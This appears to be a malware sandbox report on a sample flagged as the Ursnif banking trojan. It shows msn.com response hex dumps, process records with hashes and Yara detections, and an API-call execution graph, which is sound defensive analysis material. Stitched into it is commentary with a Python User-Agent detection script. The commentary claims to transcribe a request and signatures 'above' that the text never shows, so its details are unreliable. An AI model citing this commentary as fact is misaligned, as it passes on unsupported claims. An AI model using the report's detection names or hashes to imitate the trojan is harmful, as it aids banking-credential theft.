Cache-Control: no-cache, no-store, no-transform
Pragma: no-cache
Content-Length: 336579
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: User-Agent
Set-Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDYzNzkyNDAsIlZlcnNpb24iOjF90; domain=msn.com; expires=Fri, 19-May-2023 12:41:40 GMT; path=/; HttpOnly
Access-Control-Allow-Origin: *
X-AspNetMvc-Version: 5.2
X-AppVersion: 20220517_28677693
X-Activity-Id: ded43fef-0e10-4ef5-a726-676e283054af
X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 20, sn: neurope-prod-hp, dt: 2022-05-18T22:13:14.6536596Z, bt: 2022-05-17T20:41:53.5606999Z}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                          X-UA-Compatible: IE=Edge;chrome=1
                                                          X-Content-Type-Options: nosniff
                                                          X-FRAME-OPTIONS: SAMEORIGIN
                                                          X-Powered-By: ASP.NET
                                                          Access-Control-Allow-Methods: HEAD,GET,OPTIONS
                                                          X-XSS-Protection: 1
                                                          X-Cache: CONFIG_NOCACHE
                                                          X-MSEdge-Ref: Ref A: DED43FEF0E104EF5A726676E283054AF Ref B: HEL01EDGE1020 Ref C: 2022-05-19T12:41:40Z
                                                          Date: Thu, 19 May 2022 12:41:40 GMT
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 22 20 20 63 6c 61 73
                                                          Data Ascii: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" style="font-size:62.5%" clas
                                                          May 19, 2022 14:41:40.899158001 CEST114INData Raw: 73 3d 22 68 69 70 65 72 66 22 20 20 64 69 72 3d 22 6c 74 72 22 20 3e 0a 0a 20 20 20 20 3c 68 65 61 64 20 64 61 74 61 2d 69 6e 66 6f 3d 22 76 3a 32 30 32 32 30 35 31 37 5f 32 38 36 37 37 36 39 33 3b 61 3a 64 65 64 34 33 66 65 66 2d 30 65 31 30 2d
                                                          Data Ascii: s="hiperf" dir="ltr" > <head data-info="v:20220517_28677693;a:ded43fef-0e10-4ef5-a726-676e283054af;cn:20;az:{did:2be360ae5c6345da911d978376c0449f, rid: 20, sn: neurope-prod-hp, dt: 2022-05-18T22:13:14.6536596Z, bt: 2022-05-17T20:41:53.56
                                                          May 19, 2022 14:41:40.899624109 CEST115INData Raw: 6c 65 61 70 69 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 64 65 2d 63 68 2f 68 6f 6d 65 70 61 67 65 2f 61 70 69 2f 6d 6f 64 75 6c 65 73 2f 66 65 74 63 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b
                                                          Data Ascii: leapi&quot;:&quot;http://www.msn.com/de-ch/homepage/api/modules/fetch&quot;,&quot;cdnmoduleapi&quot;:&quot;http://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;,&quot;pdpdeltaupdateapi&quot;:&quot;http://www.ms
                                                          May 19, 2022 14:41:40.899843931 CEST117INData Raw: 6d 66 61 63 74 6f 72 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 64 65 73 6b 74 6f 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 64 6f 6d 61 69 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 77 77 77 2e 6d 73 6e 2e 63 6f 6d 26 71 75 6f 74 3b 2c 26 71 75 6f 74
                                                          Data Ascii: mfactor&quot;:&quot;desktop&quot;,&quot;domain&quot;:&quot;www.msn.com&quot;,&quot;locale&quot;:{&quot;language&quot;:&quot;de&quot;,&quot;script&quot;:&quot;&quot;,&quot;market&quot;:&quot;ch&quot;},&quot;os&quot;:&quot;windows&quot;,&quot;pa
                                                          May 19, 2022 14:41:40.899981022 CEST118INData Raw: 72 65 73 68 5f 63 6f 75 6e 74 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 30 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 6a 61 78 74 69 6d 65 6f 75 74 69 6e 73 65 63 6f 6e 64 73 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 36 30 26 71 75 6f 74 3b 7d 2c 26 71
                                                          Data Ascii: resh_count&quot;:&quot;0&quot;,&quot;ajaxtimeoutinseconds&quot;:&quot;60&quot;},&quot;imgsrc&quot;:{&quot;quality_high&quot;:&quot;60&quot;,&quot;quality_low&quot;:&quot;5&quot;,&quot;order_timeout&quot;:&quot;1000&quot;},&quot;adsettings&quot
                                                          May 19, 2022 14:41:40.900139093 CEST119INData Raw: 29 20 7b 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 20 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 54
                                                          Data Ascii: ) { if (typeof window.performance.mark == "function") { window.performance.mark("TimeToHeadStart"); } }</script> <meta charset="utf-8" /> <meta name="robots" content="index, follow"/> <link rel="preload" href
                                                          May 19, 2022 14:41:40.900228977 CEST121INData Raw: 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 61 74 69 63 2d 67 6c 6f 62 61 6c 2d 73 2d 6d 73 6e 2d 63 6f 6d 2e 61 6b 61 6d 61 69 7a 65 64 2e 6e 65 74 2f 68 70 2d 6e 65 75 2f 64 65 2d 63 68 2f 68 6f
                                                          Data Ascii: el="stylesheet" href="http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.locales=de-ch.themes=start.dpi=resolution1x/e2-71f5b2-345a9e05/e5-356483-1afafcc5/7f-145015-491caa4c/8b-ebeae2-377c9bd6/84
                                                          May 19, 2022 14:41:40.900367022 CEST122INData Raw: 65 2c 68 5b 65 5d 3d 74 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 6e 2c 72 2c 75 29 7b 69 66 28 72 7c 7c 28 72 3d 74 29 2c 69 29 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6e 29 3b 75 7c 7c 28 75 3d 6f 28 72 29 29 3b
                                                          Data Ascii: e,h[e]=t),t}function l(n,r,u){if(r||(r=t),i)return r.createElement(n);u||(u=o(r));var f;return f=u.cache[n]?u.cache[n].cloneNode():y.test(n)?(u.cache[n]=u.createElem(n)).cloneNode():u.createElem(n),f.canHaveChildren&&!v.test(n)?u.frag.appendCh
                                                          May 19, 2022 14:41:40.900387049 CEST122INData Raw: 28 22 61 22 29 3b 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 78 79 7a 3e 3c 5c 2f 78 79 7a 3e 22 3b 66 3d 22 68 69 64 64 65 6e 22 69 6e 20 6e 3b 69 3d 6e 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3d 3d 31 7c 7c 66 75 6e 63 74 69 6f 6e
                                                          Data Ascii: ("a");n.innerHTML="<xyz><\/xyz>";f="hidden"in n;i=n.childNodes.length==1||function(){t.createElement("a");var n=t.createDocumentFragment();return typeof n.cloneNode
                                                          May 19, 2022 14:41:40.901165009 CEST124INData Raw: 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 74 79 70 65 6f 66 20 6e 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 74 79 70 65 6f 66 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e
                                                          Data Ascii: =="undefined"||typeof n.createDocumentFragment=="undefined"||typeof n.createElement=="undefined"}()}catch(r){f=!0;i=!0}})();r={elements:u.elements||"abbr article aside audio bdi canvas data datalist details figcaption figure footer header hgro
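                                                          The request above is the sample's connectivity check against www.msn.com. Two things in it are worth turning into a detection: the User-Agent claims "MSIE 8.0" on "Windows NT 10.0" (Internet Explorer 8 was never shipped for Windows 10, which only carries IE11, and real IE8 always appends a "Trident/4.0" token), and the request carries none of the Accept, Accept-Language or Accept-Encoding headers a browser sends. The following Python is an added example, not Joe Security's code or part of the report; the request text is transcribed from the dump with the Cookie header dropped, and the MSIE-to-NT support table is encoded from the published IE support matrix (treat it as an assumption and verify before relying on it).

```python
import re

# Constructed transcription of the request the sample sent to www.msn.com
# (from the network dump above); the Cookie header is dropped for brevity.
CAPTURED_REQUEST = (
    "GET /de-ch/ HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "Host: www.msn.com\r\n"
    "\r\n"
)

# Highest Windows NT version each MSIE release was ever offered for
# (XP=5.1, 2003=5.2, Vista=6.0, 7=6.1, 8=6.2). Windows 10 is NT 10.0 and only
# carries IE11, whose UA says "Trident/7.0; rv:11.0" and never "MSIE".
# Assumption: table reproduced from the IE support matrix, not from the report.
MSIE_MAX_NT = {
    "6.0": (5, 2),
    "7.0": (6, 0),
    "8.0": (6, 1),
    "9.0": (6, 1),
    "10.0": (6, 2),
}

# Headers every mainstream browser sends on a navigation request; loader-driven
# WinINet/WinHTTP style clients typically omit them.
EXPECTED_BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding")

UA_RE = re.compile(r"MSIE (\d+\.\d+); Windows NT (\d+\.\d+)")


def parse_request(raw: str):
    """Split an HTTP/1.1 request head into (request line, {lower-cased header: value})."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:          # blank line terminates the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def _ver(s: str):
    """Turn '6.1' into (6, 1) so versions compare numerically, not lexically."""
    return tuple(int(p) for p in s.split("."))


def assess_user_agent(ua: str):
    """Return the reasons an MSIE-style User-Agent is internally inconsistent."""
    findings = []
    m = UA_RE.search(ua)
    if not m:
        return findings                       # not an MSIE-style UA; nothing to cross-check
    ie, nt = m.group(1), _ver(m.group(2))
    max_nt = MSIE_MAX_NT.get(ie)
    if max_nt is not None and nt > max_nt:
        findings.append(f"MSIE {ie} never shipped for Windows NT {m.group(2)}")
    if _ver(ie) >= (8, 0) and "Trident/" not in ua:
        findings.append("MSIE 8+ UA without the Trident/ token real IE always adds")
    return findings


def triage_request(raw: str):
    """Combine the UA consistency checks with the missing-header heuristic."""
    _, headers = parse_request(raw)
    findings = assess_user_agent(headers.get("user-agent", ""))
    for h in EXPECTED_BROWSER_HEADERS:
        if h not in headers:
            findings.append(f"missing browser header: {h}")
    return findings


if __name__ == "__main__":
    for f in triage_request(CAPTURED_REQUEST):
        print("-", f)
```

                                                          Run against the captured request this yields three UA findings plus the three missing headers; a genuine IE8-on-Windows-7 UA with its Trident token and a genuine IE11 UA produce no UA findings, so the check can sit in a proxy log pipeline without flagging real browsers.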

                                                          Target ID:0
                                                          Start time:14:39:49
                                                          Start date:19/05/2022
                                                          Path:C:\Users\user\Desktop\OojqjHGE0W.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\OojqjHGE0W.exe"
                                                          Imagebase:0xb20000
                                                          File size:1241656 bytes
                                                          MD5 hash:4ED3FA33609A51BAF209A5954BEF6633
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:10
                                                          Start time:14:41:25
                                                          Start date:19/05/2022
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Imagebase:0xd80000
                                                          File size:41064 bytes
                                                          MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high


                                                            Execution Graph

                                                            Execution Coverage:2.7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:3.3%
                                                            Total number of Nodes:1225
                                                            Total number of Limit Nodes:20
                                                            execution_graph: interactive node/edge rendering; the node list is not reproducible as text. What survives is the set of API calls resolved on the graph's nodes, which are basic-block addresses in the 0xb2xxxx to 0xb4xxxx range of OojqjHGE0W.exe (image base 0xb20000): GetProcAddress, VirtualProtect, LoadLibraryW, Sleep, GetModuleHandleW, GetModuleFileNameW, LocalAlloc, LocalFree, TlsGetValue, TlsSetValue, EncodePointer, DecodePointer, RtlEncodePointer, RtlUnwind, InterlockedIncrement, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetOEMCP, GetACP, GetCPInfo, IsValidCodePage, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, GetStringTypeW, GetEnvironmentStringsW, FreeEnvironmentStringsW, CreateFileW, WriteFile, WriteConsoleW, SetFilePointer, GetConsoleCP, GetConsoleMode, GetLastError, CloseHandle, alongside MSVC runtime internals (__invalid_parameter, __flsbuf, __write, __setmbcp, ___crtMessageWindowW, ___InternalCxxFrameHandler, FindHandler, ___addlocaleref and the like).
                                                            Most of the graph is that C runtime startup, locale and exception-handling code. The nodes worth following in the disassembly are the short non-CRT chains: b2f410 GetProcAddress -> b2f45a VirtualProtect, b31e90 -> b31ee6 LoadLibraryW + Sleep, b29d64 LocalAlloc, and b282db GetProcAddress + LocalFree, which are the resolve-API / change-protection / delay pattern consistent with the injection and evasion signatures listed above.
b3686a 8244->8246 8248 b3ae80 8246->8248 8247 b3689e 8247->8195 8249 b3ae97 8248->8249 8252 b3ae9e 8248->8252 8250 b364d0 __NMSG_WRITE 31 API calls 8249->8250 8250->8252 8258 b38180 DecodePointer 8252->8258 8253 b3aea6 8254 b3aeb6 8253->8254 8259 b37e10 8253->8259 8255 b3aed2 8254->8255 8257 b38260 __call_reportfault 8 API calls 8254->8257 8255->8247 8257->8255 8258->8253 8263 b37e69 8259->8263 8260 b37e7a 8261 b37fa4 DecodePointer 8260->8261 8264 b37eee _raise 8261->8264 8262 b37f73 8265 b381d0 __invalid_parameter 11 API calls 8262->8265 8263->8260 8263->8261 8263->8262 8263->8264 8267 b38026 8264->8267 8269 b37efc 8264->8269 8270 b35ad0 RtlEncodePointer 8264->8270 8265->8269 8271 b3807a 8267->8271 8269->8254 8270->8267 8272 b38080 8271->8272 8273 b38087 8271->8273 8275 b37dc0 LeaveCriticalSection 8272->8275 8273->8269 8275->8273 8277 b3fe00 8276->8277 8278 b3fdfe 8276->8278 8279 b368e0 FindHandlerForForeignException 35 API calls 8277->8279 8280 b36830 FindHandler 34 API calls 8278->8280 8281 b3fe10 ___TypeMatch 8278->8281 8279->8278 8280->8281 8281->8233 8325 b453a0 8282->8325 8285 b45280 8286 b452bc RaiseException 8285->8286 8287 b452ab 8285->8287 8286->8205 8287->8286 8289 b3b2a4 8288->8289 8293 b3b26f 8288->8293 8290 b3b2c0 8289->8290 8291 b368e0 FindHandlerForForeignException 35 API calls 8289->8291 8290->8219 8291->8290 8292 b368e0 FindHandlerForForeignException 35 API calls 8292->8293 8293->8289 8293->8292 8295 b3f5c4 8294->8295 8296 b3f5d9 8294->8296 8342 b3fbe0 8295->8342 8298 b3f5e2 8296->8298 8299 b3f5f1 8296->8299 8346 b3af50 RtlUnwind 8298->8346 8347 b3af50 RtlUnwind 8299->8347 8302 b3f5ef 8303 b3f430 ___FrameUnwindToState 35 API calls 8302->8303 8304 b3f615 CatchIt CallCatchBlock 8303->8304 8304->8219 8305->8228 8306->8228 8308 b3fee0 8307->8308 8309 b3fee9 8308->8309 8310 b368e0 FindHandlerForForeignException 35 API calls 8308->8310 8361 b368b0 8309->8361 8310->8309 8313 b36830 FindHandler 34 API calls 8314 b3ff2e 8313->8314 8314->8211 8317 b3f189 
8315->8317 8323 b3f184 8315->8323 8316 b3f1f7 8319 b3b250 _GetRangeOfTrysToCheck 35 API calls 8316->8319 8322 b3f1a3 _CallSETranslator 8317->8322 8365 b35ad0 RtlEncodePointer 8317->8365 8318 b368e0 FindHandlerForForeignException 35 API calls 8318->8316 8321 b3f217 8319->8321 8321->8323 8324 b3f5b0 CatchIt 36 API calls 8321->8324 8322->8316 8322->8318 8322->8323 8323->8211 8324->8321 8328 b454c0 8325->8328 8329 b3edcc 8328->8329 8330 b454d1 _malloc _strlen 8328->8330 8329->8285 8330->8329 8332 b3d060 8330->8332 8335 b3d06e 8332->8335 8333 b3d0e4 _memset 8337 b3d179 8333->8337 8340 b3d1a9 _memset 8333->8340 8334 b3d0b4 8336 b381d0 __invalid_parameter 11 API calls 8334->8336 8335->8333 8335->8334 8339 b3d0d7 _memset 8336->8339 8338 b381d0 __invalid_parameter 11 API calls 8337->8338 8338->8339 8339->8329 8340->8339 8341 b381d0 __invalid_parameter 11 API calls 8340->8341 8341->8339 8343 b3fc22 8342->8343 8348 b3f970 8343->8348 8345 b3fc56 ___DestructExceptionObject ___AdjustPointer 8345->8296 8346->8302 8347->8302 8349 b3f9b5 8348->8349 8359 b3f9d8 ___BuildCatchObjectHelper ___AdjustPointer 8348->8359 8350 b3fa6d 8349->8350 8352 b3fa15 _ValidateRead 8349->8352 8349->8359 8351 b3faef 8350->8351 8353 b3fa77 _ValidateRead 8350->8353 8356 b3faf8 _ValidateRead 8351->8356 8360 b3fb52 _ValidateRead 8351->8360 8354 b368e0 FindHandlerForForeignException 35 API calls 8352->8354 8352->8359 8355 b368e0 FindHandlerForForeignException 35 API calls 8353->8355 8353->8359 8354->8359 8355->8359 8358 b368e0 FindHandlerForForeignException 35 API calls 8356->8358 8356->8359 8357 b368e0 FindHandlerForForeignException 35 API calls 8357->8359 8358->8359 8359->8345 8360->8357 8360->8359 8362 b368bb 8361->8362 8363 b36830 FindHandler 34 API calls 8362->8363 8364 b368cf 8363->8364 8364->8313 8365->8322 8613 b391e0 8614 b391ef ___crtMessageWindowW 8613->8614 8615 b39217 GetModuleFileNameA 8614->8615 8616 b3920d 8614->8616 8617 b39236 8615->8617 8623 b3926b _strlen 8615->8623 8619 b3a1a0 
___crtMessageWindowW 5 API calls 8616->8619 8618 b3d060 _wcscpy_s 11 API calls 8617->8618 8621 b39262 8618->8621 8620 b395d6 8619->8620 8622 b32e70 __invoke_watson_if_error 10 API calls 8621->8622 8622->8623 8624 b3ca80 _memcpy_s 11 API calls 8623->8624 8627 b392e2 _strlen 8623->8627 8625 b392d9 8624->8625 8626 b32e70 __invoke_watson_if_error 10 API calls 8625->8626 8626->8627 8639 b39fa0 8627->8639 8629 b39500 8630 b359e0 __invoke_watson_if_oneof 10 API calls 8629->8630 8632 b39533 8629->8632 8630->8632 8631 b3957e 8642 b3ce40 8631->8642 8632->8631 8633 b3d060 _wcscpy_s 11 API calls 8632->8633 8635 b39575 8633->8635 8637 b32e70 __invoke_watson_if_error 10 API calls 8635->8637 8637->8631 8638 b37e10 _raise 14 API calls 8638->8616 8660 b3e390 8639->8660 8641 b39fc7 8641->8629 8685 b35ad0 RtlEncodePointer 8642->8685 8644 b3ce5e 8645 b3ce83 LoadLibraryW 8644->8645 8646 b3cf47 8644->8646 8647 b3ce9e GetProcAddress 8645->8647 8655 b3ce97 8645->8655 8649 b3cf5d DecodePointer DecodePointer 8646->8649 8659 b3cf82 8646->8659 8648 b3cebd 7 API calls 8647->8648 8647->8655 8648->8646 8652 b3cf2c GetProcAddress EncodePointer 8648->8652 8649->8659 8650 b3d024 DecodePointer 8650->8655 8651 b3a1a0 ___crtMessageWindowW 5 API calls 8656 b39597 8651->8656 8652->8646 8653 b3cfee 8653->8650 8657 b3d004 DecodePointer 8653->8657 8654 b3cfd8 DecodePointer 8654->8653 8655->8651 8656->8616 8656->8638 8657->8650 8658 b3cfc0 8657->8658 8658->8650 8659->8653 8659->8654 8659->8658 8661 b3e3b8 8660->8661 8662 b3e3df 8661->8662 8666 b3e410 8661->8666 8663 b381d0 __invalid_parameter 11 API calls 8662->8663 8672 b3e405 _memset 8663->8672 8664 b3e4a9 8667 b3e4b5 8664->8667 8668 b3e56c 8664->8668 8665 b3e478 8669 b381d0 __invalid_parameter 11 API calls 8665->8669 8666->8664 8666->8665 8666->8672 8675 b3df30 8667->8675 8670 b3df30 __vsnprintf_helper 40 API calls 8668->8670 8669->8672 8673 b3e4e0 _memset 8670->8673 8672->8641 8673->8672 8674 b381d0 __invalid_parameter 11 API calls 8673->8674 8674->8672 
8677 b3df6e 8675->8677 8676 b3df92 8679 b381d0 __invalid_parameter 11 API calls 8676->8679 8677->8676 8678 b3dfc0 8677->8678 8680 b3e00c 8678->8680 8683 b3e03a 8678->8683 8682 b3dfb5 8679->8682 8681 b381d0 __invalid_parameter 11 API calls 8680->8681 8681->8682 8682->8673 8683->8682 8684 b3dc10 __flsbuf 40 API calls 8683->8684 8684->8682 8685->8644 9106 b32260 9107 b322ba 9106->9107 9108 b32272 9106->9108 9108->9107 9109 b36830 FindHandler 34 API calls 9108->9109 9109->9107 9080 b35ae0 TlsAlloc 9081 b37ae0 9083 b37af8 9081->9083 9082 b37b4d 9083->9082 9084 b37b14 InitializeCriticalSectionAndSpinCount 9083->9084 9084->9082 9084->9083 9299 b36b60 9300 b33d00 9299->9300 9301 b36b7b EncodePointer 9300->9301 9302 b36ba2 9301->9302 9125 b297e6 9126 b29818 9125->9126 9129 b2970f 9125->9129 9127 b29d64 LocalAlloc 9126->9127 9126->9129 9128 b2b00f 9127->9128 9128->9128 9129->9129 7845 b32cd0 7846 b32cf5 _wcslen 7845->7846 7847 b32ced 7845->7847 7846->7847 7850 b38980 7846->7850 7860 b32e70 7846->7860 7852 b3898e 7850->7852 7851 b389d4 7864 b381d0 DecodePointer 7851->7864 7852->7851 7856 b38a04 _memset 7852->7856 7854 b389f7 _memset 7854->7846 7855 b38acd _memset 7855->7854 7859 b381d0 __invalid_parameter 11 API calls 7855->7859 7856->7855 7857 b38a9d 7856->7857 7858 b381d0 __invalid_parameter 11 API calls 7857->7858 7858->7854 7859->7854 7861 b32e7b 7860->7861 7862 b32e7d 7860->7862 7861->7846 7863 b38230 __invoke_watson 10 API calls 7862->7863 7863->7861 7865 b3820d 7864->7865 7867 b381f1 7864->7867 7868 b38230 7865->7868 7867->7854 7871 b38260 7868->7871 7872 b3827b _memset __call_reportfault 7871->7872 7873 b382a1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7872->7873 7874 b38389 __call_reportfault 7873->7874 7877 b3a1a0 7874->7877 7876 b38243 GetCurrentProcess TerminateProcess 7876->7867 7878 b3a1aa IsDebuggerPresent 7877->7878 7879 b3a1a8 7877->7879 7885 b395f0 7878->7885 7879->7876 7882 b3e93f SetUnhandledExceptionFilter 
UnhandledExceptionFilter 7883 b3e968 GetCurrentProcess TerminateProcess 7882->7883 7884 b3e95e __call_reportfault 7882->7884 7883->7876 7884->7883 7885->7882 7886 b361d0 HeapCreate 7887 b361fa 7886->7887 7906 b323d0 7908 b323df __IsNonwritableInCurrentImage 7906->7908 7912 b36bc0 7908->7912 7909 b32402 __initterm_e 7911 b3241d __IsNonwritableInCurrentImage __initterm 7909->7911 7916 b36b40 7909->7916 7915 b36bcf 7912->7915 7913 b36bfb 7913->7909 7914 b36bde RtlEncodePointer 7914->7915 7915->7913 7915->7914 7919 b36970 7916->7919 7920 b369a7 _atexit 7919->7920 7925 b369f0 DecodePointer DecodePointer 7920->7925 7926 b36a1f 7925->7926 7927 b369b7 7925->7927 7926->7927 7939 b34960 7926->7939 7936 b369cb 7927->7936 7929 b36b03 EncodePointer EncodePointer 7929->7927 7931 b36a96 7931->7927 7933 b33d60 __realloc_dbg 48 API calls 7931->7933 7934 b36adc EncodePointer 7931->7934 7935 b36acc 7933->7935 7934->7929 7935->7927 7935->7934 8137 b328e0 7936->8137 7940 b349a4 7939->7940 7941 b349cb 7940->7941 7942 b349fc 7940->7942 7944 b381d0 __invalid_parameter 11 API calls 7941->7944 7946 b34a1b 7942->7946 7956 b34b90 7942->7956 7949 b349f1 7944->7949 7962 b35160 7946->7962 7947 b34a75 7966 b34b26 7947->7966 7949->7929 7949->7931 7950 b33d60 7949->7950 7951 b33d99 7950->7951 7976 b33e00 7951->7976 7953 b33dbe 7987 b33dd2 7953->7987 7957 b34bd6 7956->7957 7960 b34bcc 7956->7960 7969 b398c0 HeapValidate 7957->7969 7960->7946 7961 b34bec _CheckBytes 7971 b34fb5 7961->7971 7963 b3516b 7962->7963 7964 b3516f __CrtIsValidHeapPointer 7962->7964 7963->7947 7964->7963 7965 b3518a HeapValidate 7964->7965 7965->7963 7975 b37dc0 LeaveCriticalSection 7966->7975 7968 b34b2d 7968->7949 7970 b398e1 7969->7970 7970->7961 7974 b37dc0 LeaveCriticalSection 7971->7974 7973 b34fbc 7973->7960 7974->7973 7975->7968 7977 b33e3a 7976->7977 7986 b33e1d _memset 7976->7986 7978 b34b90 __CrtCheckMemory 2 API calls 7977->7978 7980 b33e7c _CheckBytes 7977->7980 7977->7986 7978->7980 7979 b35160 
__CrtIsValidHeapPointer HeapValidate 7981 b3408a 7979->7981 7980->7979 7980->7986 7982 b34173 7981->7982 7983 b34198 7981->7983 7981->7986 7990 b39770 7982->7990 8005 b39610 7983->8005 7986->7953 8136 b37dc0 LeaveCriticalSection 7987->8136 7989 b33dd0 7989->7931 7991 b39796 7990->7991 7992 b39785 7990->7992 7994 b3979c 7991->7994 7999 b397af 7991->7999 8016 b39080 7992->8016 8023 b39870 7994->8023 7996 b397e5 8027 b383c0 DecodePointer 7996->8027 7998 b397c9 HeapReAlloc 7998->7999 7999->7996 7999->7998 8000 b3980f 7999->8000 8003 b383c0 __callnewh DecodePointer 7999->8003 8004 b39844 GetLastError 7999->8004 8001 b39817 GetLastError 8000->8001 8002 b3978e __free_base 8000->8002 8001->8002 8002->7986 8003->7999 8004->8002 8008 b3962b 8005->8008 8006 b3964f 8011 b381d0 __invalid_parameter 11 API calls 8006->8011 8007 b3967c 8009 b3969e HeapSize HeapReAlloc 8007->8009 8013 b39672 __free_base 8007->8013 8008->8006 8008->8007 8010 b396d2 8009->8010 8009->8013 8012 b396f4 GetLastError 8010->8012 8134 b39720 HeapQueryInformation 8010->8134 8011->8013 8012->8013 8013->7986 8017 b390d6 8016->8017 8022 b39093 8016->8022 8018 b383c0 __callnewh DecodePointer 8017->8018 8021 b390a8 8018->8021 8020 b383c0 __callnewh DecodePointer 8020->8022 8021->8002 8022->8020 8022->8021 8029 b39110 8022->8029 8024 b39886 HeapFree 8023->8024 8025 b39884 __free_base 8023->8025 8024->8025 8026 b398a2 GetLastError 8024->8026 8025->8002 8026->8025 8028 b383db 8027->8028 8028->8002 8030 b3913b RtlAllocateHeap 8029->8030 8031 b3911f 